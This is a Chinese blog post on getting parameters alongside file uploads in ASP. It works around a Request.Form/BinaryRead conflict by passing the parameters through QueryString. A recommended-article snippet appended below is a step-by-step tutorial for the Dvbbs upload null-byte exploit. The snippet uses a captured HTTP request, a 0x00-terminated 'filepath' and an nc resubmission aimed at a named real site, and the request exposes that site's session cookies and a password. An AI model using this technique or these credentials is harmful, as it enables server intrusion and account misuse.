asp无惧上传类2.2上传文件的同时,通过 Request.QueryString将参数传递到保存页面中...

先转一段文字,对不对再评论

在后台asp程序中,以前获取表单提交的ASCII数据,非常的容易。但是如果需要获取上传的文件,就必须使用Request对象的BinaryRead方法来读取。BinaryRead方法是对当前输入流进行指定字节数的二进制读取,有点需要注意的是,一旦使用BinaryRead方法后,再也不能使用Request.Form或Request.QueryString集合了。结合Request对象的TotalBytes属性,可以将所有表单提交的数据全部变成二进制,不过这些数据都是经过编码的。

好像不全对 ,蓝色字体这里好像有 问题,用无惧上传类2.2(作者好像说是2.0,也许有人改动过)上传文件时,Request.Form就是不能用,和该类冲突。这个也许就是以为蓝色字体提到的原因,可是Request.QueryString可以用。为了解决传文件的同时,要传递变量值,我使用的方法是:

如果设置批量上传,则通过文件上传xml到服务器然后写入mdb,如果不是批量上除,单个例如则用form提取变量值。

批量是时候,将tea_savework.asp递交地址改写成?piliang=true&。。。。。其他变量值,就是下面的代码:


if piliang="" then
%>
<form name="form1" method="post" action="tea_savework.asp">
<%else%>
<form name="form1" method="post" action="tea_savework.asp?piliang=true&cla_id=<%=set_cla_id%>&sub_id=<%=set_sub_id%>&ter_id=<%=set_ter_id%>&bwc_id=<%=set_bwc_id%>" enctype="multipart/form-data">
<%end if%>

.....

<%if piliang = "on" then %> 请选择上传成绩的Excel文件(必须使用模板创建的成绩文件)<input name="wenjian" type="file" > <% end if%>
<input type="submit" name="Submit3" value="录入全班考试成绩">
<input name="bbs_count" type="hidden" id="bbs_count" value="<%=i%>" size="2">
<input name="cla_id" type="hidden" id="cla_id" value="<%=set_cla_id%>" size="2">
<input name="sub_id" type="hidden" id="sub_id" value="<%=set_sub_id%>" size="2">
<input name="ter_id" type="hidden" id="ter_id" value="<%=set_ter_id%>" size="2">
<input name="bwc_id" type="hidden" id="bwc_id" value="<%=set_bwc_id%>" size="2">

-------------------------------------------------------------------------------------------------------------------------

tea_savework.asp中的保存代码:

test=0
if request.querystring("piliang")="true" then
cla_id=Request.QueryString("cla_id")
ter_id=Request.QueryString("ter_id")
sub_id=Request.QueryString("sub_id")
bwc_id=Request.QueryString("bwc_id")
call savefile() ‘先得到变量值,然后保存文件,具体代码不写了。
test=1
else
bbs_count=Request.form("bbs_count")
bbs_count=request.form("bbs_count")
cla_id=request.form("cla_id")
ter_id=request.form("ter_id")
sub_id=request.form("sub_id")
bwc_id=request.form("bwc_id")
end if

在使用该类的同时,不能通过request.form获取参数,和该类中读取文件的操作冲突,怀疑是用了上面蓝色字体提到的方法,将form中的参数破坏了,如果先使用form获取参数,那么该类就无法读取文件。。。。。。所以用querystring获取?后面的变量值,然后再创建类实现读取上传的二进制文件,并保存。

TMD好久没搞asp了,手里所有的书里 关于asp保存文件都没提,浏览器对这个递交文件的格式是应该是统一的,但是asp对他 处理的方式比较特殊,原来以为用form可以将参数值获取,再用类读上传的二进制文件,现在看来好像二者是冲突的,用form得到参数,好像会破坏递交的数据,是不是form方法对二进制文件进行了格式处理,这样不能用

BinaryRead 方法读了???不知道!!!

也许用form方法得到参数值之后,是不是可以用其他方法得到上传的二进制文件?我想微软的asp应该有自己的方式,不应该会破坏上传的二进制文件。只是不知道用什么方式,现在到处都是转载,乱转,,,,,分析的人少,即使分析的也是N年(估计大约是04年左右的文章)前分析的,应该不透彻。


好久没说话了,自己都不知道自己说了些什么,乱。。。。。。给自己看就行了,当做笔记。大家就不要看了~~~~

版权声明:本文为博主原创文章,未经博主允许不得转载。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
上传漏洞终结篇 一、写在前面 ***这个上传漏洞利用的原理只是针对form格式上传asp和php脚本*** NC(Netcat)   用于提交数据包   DOS界面下运行:   NC -vv www.***.com 80<1.txt   -vv: 回显   80: www端口   1.txt: 就是你要发送的数据包  (更多使用方法请查看本区的帖子) WSE(WSockExpert)   对本机端口的监视,抓取IE提交的数据包  (不会用的就自己到网上搜资料N多) 二、漏洞原理 下面例子假设的前提 www主机: www.***.com; bbs路径 : /bbs/ 漏洞源于对动网上传文件的研究,建议有一定编程经验的 看看Dvbbs的upfile.asp文件,没有必要全部看懂 upfile是通过生成一个form表上传,如下 <form name="form" method="post" action="upfile.asp" ...> <input type="hidden" name="filepath" value="uploadFace"> <input type="hidden" name="act" value="upload"> <input type="file" name="file1"> <input type="hidden" name="fname"> <input type="submit" name="Submit" value="上传" ...></form> 用到的变量: filepath 默认值uploadface 属性hiden act   默认值upload   属性hiden file1  就是你要传的那个文件 关键是 filepath 这个变量! 默认情况下我们的文件上传到www.***.com/bbs/uploadface/ 文件是用你的上传时间命名的,就是upfile里的这一句 FileName=FormPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&FileExt ------------------------------------------------------------------------- 我们知道计算机里面的数据是一"\0"为标致的用过C语言的都知道 char data[]="bbs" 这个data数组长度是4: b b s \0 如果我们构造filepath如下,会怎么样呢? filepath="/newmm.asp\0" 我们在2004.09.24.08.24传的文件就会发生变化 没有改时: http://www.***.com/bbs/uploadface/200409240824.jpg 用我们构造的filepath时: http://www.***.com/newmm.asp\0/200409240824.jpg 这样当服务器接收filepath数据时,检测到newmm.asp后面的\0 就理解为filepath的数据就结束了 这样我们上传的文件,比如c:\1.asp保存成: http://www.***.com/newmm.asp 三、后期补充 漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行 有很多网站只是加了N个hiden属性的变量对付网上公布的upfile.exe就是那个 上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊。。 而且很对网站的插件里有似的漏洞,我要说的不要依赖哪些专门的工具 自己改WSE抓到的包里的filepath变量,然后在用NC提交。。。 就算他加N个hiden变量也于事无补。 当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结 就是我们的新理论诞生的时候! 四、漏洞列表 http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5369http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5530http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5531http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5693http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5731http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5746 监听外部主机     NC [-options] hostname port[s] [ports] ... 监听本地主机     NC -l -p port [options] [hostname] [port] options:     -d       detach from console, stealth mode     -e prog     inbound program to exec [dangerous!!]     -g gateway   source-routing hop point[s], up to 8     -G num     source-routing pointer: 4, 8, 12, ...     -h       this cruft     -i secs     delay interval for lines sent, ports scanned     -l       listen mode, for inbound connects     -L       listen harder, re-listen on socket close     -n       numeric-only IP addresses, no DNS     -o file     hex dump of traffic     -p port     local port number     -r       randomize local and remote ports     -s addr     local source address     -t       answer TELNET negotiation     -u       UDP mode     -v       verbose [use twice to be more verbose]     -w secs     timeout for connects and final net reads     -z       zero-I/O mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive] 详细实例: --------------------------------------------------------------------------------- 一、WSE抓包结果(存到1.txt里): POST /bbs/upPhoto/upfile.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://www.xin126.com/bbs/upPhoto/upload.asp Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d423a138d0278 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Host: www.xin126.com Content-Length: 1969 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDACCCCDCS=NJHCPHPALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24+3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; userPass=eb03f6c72908fd84 -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" ../medias/myPhoto/ -----------------------------7d423a138d0278 ... ... 上传 -----------------------------7d423a138d0278-- --------------------------------------------------------------------------------- 二、UltraEdit打开1.txt改数据: ...... -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" /newmm.asp█         <===这个黑色代表一个空格是 0x20,改成0x00就可以了 ...... --------------------------------------------------------------------------------- 三、重新计算cookies长度,然后nc提交 Nc -vv www.xin126.com 80 <1.txt UltraEdit是一个16位编辑器网上可以下载得到 我们主要用来写那个结束标致: \0 ====>16位表示:0x00或者00H 其实你改的时候就直接再filepath的结尾处加个00就OK了 计算cookies长度===>你把fillepath改了之后、肯定是或+或—cookies的长度变了 ...... Host: www.xin126.com Content-Length: 1969 <======就是这个 Connection: Keep-Alive Cache-Control: no-cache ...... 计算会吧?一个字母、数字就是1 对于上传漏洞提出的解决思路:(仅供参考) 1、一般的上传是把上传路径作为一个变量来处理 ===>我们的对策就是把filepath变成常量。。。 这个方法是目前最有效的(我认为的) 2、加强对于\0的处理,原来我们是读到这里就结束 我们继续读直道下一个变量开始的地方,处理就OK了
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值